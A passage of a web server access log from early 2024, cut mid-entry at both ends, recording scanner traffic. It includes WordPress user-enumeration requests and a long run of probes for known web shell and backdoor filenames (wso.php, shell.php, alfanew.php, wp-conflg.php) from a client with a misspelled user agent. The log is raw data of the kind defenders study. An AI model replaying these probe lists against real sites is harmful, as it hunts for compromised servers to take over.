scaninfo@paloaltonetworks.com" 110.173.135.98 - - [28/Feb/2024:08:17:14 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 110.173.135.98 - - [28/Feb/2024:08:17:19 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 110.173.135.98 - - [28/Feb/2024:08:17:21 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 199.45.155.49 - - [28/Feb/2024:22:56:53 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 3.78.247.129 - - [29/Feb/2024:01:34:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:34:22 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:35:30 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:35:30 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:35:32 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:35:32 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 3.78.247.129 - - [29/Feb/2024:01:35:35 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:01:35 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:01:44 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:01:53 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:02:03 +0700] "GET /cloud.php/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:02:12 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [29/Feb/2024:13:02:15 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 159.65.30.63 - - [01/Mar/2024:17:59:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 103.1.208.222 - - [02/Mar/2024:02:23:37 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.1.208.222 - - [02/Mar/2024:02:23:40 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.1.208.222 - - [02/Mar/2024:02:23:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [02/Mar/2024:10:10:16 +0700] "GET /admin.php?auth_key HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Mar/2024:10:10:30 +0700] "GET /content.php?auth_key HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Mar/2024:10:10:42 +0700] "GET /lock360.php?auth_key HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Mar/2024:10:10:56 +0700] "GET /about.php?auth_key HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.235.24.155 - - [02/Mar/2024:21:05:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 168.228.42.109 - - [03/Mar/2024:05:11:03 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56" 91.92.252.169 - - [03/Mar/2024:05:52:17 +0700] "GET /about.php?auth_key HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 116.62.155.4 - - [04/Mar/2024:03:57:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 116.62.155.4 - - [04/Mar/2024:03:58:05 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 116.62.155.4 - - [04/Mar/2024:03:58:10 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.18 - - [04/Mar/2024:12:21:04 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 52.17.186.126 - - [04/Mar/2024:21:45:25 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 91.92.252.169 - - [05/Mar/2024:03:28:32 +0700] "GET /about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:28:48 +0700] "GET /wp-includes/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:29:03 +0700] "GET /wp-admin/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:29:21 +0700] "GET /wp-admin/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:29:38 +0700] "GET /wp-content/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:29:54 +0700] "GET /wp-content/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Mar/2024:03:30:12 +0700] "GET /admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 208.109.34.70 - - [06/Mar/2024:01:22:23 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.34.70 - - [06/Mar/2024:01:22:28 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.34.70 - - [06/Mar/2024:01:22:33 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 36.99.136.136 - - [06/Mar/2024:03:52:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 36.99.136.136 - - [06/Mar/2024:03:52:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 36.99.136.128 - - [06/Mar/2024:03:52:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 184.168.103.93 - - [07/Mar/2024:01:32:13 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 184.168.103.93 - - [07/Mar/2024:01:32:16 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 184.168.103.93 - - [07/Mar/2024:01:32:18 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 213.232.193.150 - - [09/Mar/2024:00:29:39 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 213.232.193.150 - - [09/Mar/2024:00:29:46 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 213.232.193.150 - - [09/Mar/2024:00:29:56 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [10/Mar/2024:14:47:16 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:20 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:24 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:27 +0700] "GET /cloud.php/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:30 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:33 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:39 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:42 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:45 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:47 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:52 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:47:55 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:01 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:07 +0700] "GET /mail.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:10 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:14 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:18 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:23 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:25 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:28 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:32 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:35 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:37 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:46 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:49 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:53 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:56 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:48:59 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:02 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:06 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:10 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:13 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:16 +0700] "GET /ini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:18 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:22 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:24 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:26 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:29 +0700] "GET /makeasmtp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:32 +0700] "GET /wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:38 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:44 +0700] "GET /wp-atom.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:50 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:49:58 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:03 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:07 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:11 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:14 +0700] "GET /configs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:17 +0700] "GET /test.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:22 +0700] "GET /classsmtps.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:34 +0700] "GET /wp-hudbud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A 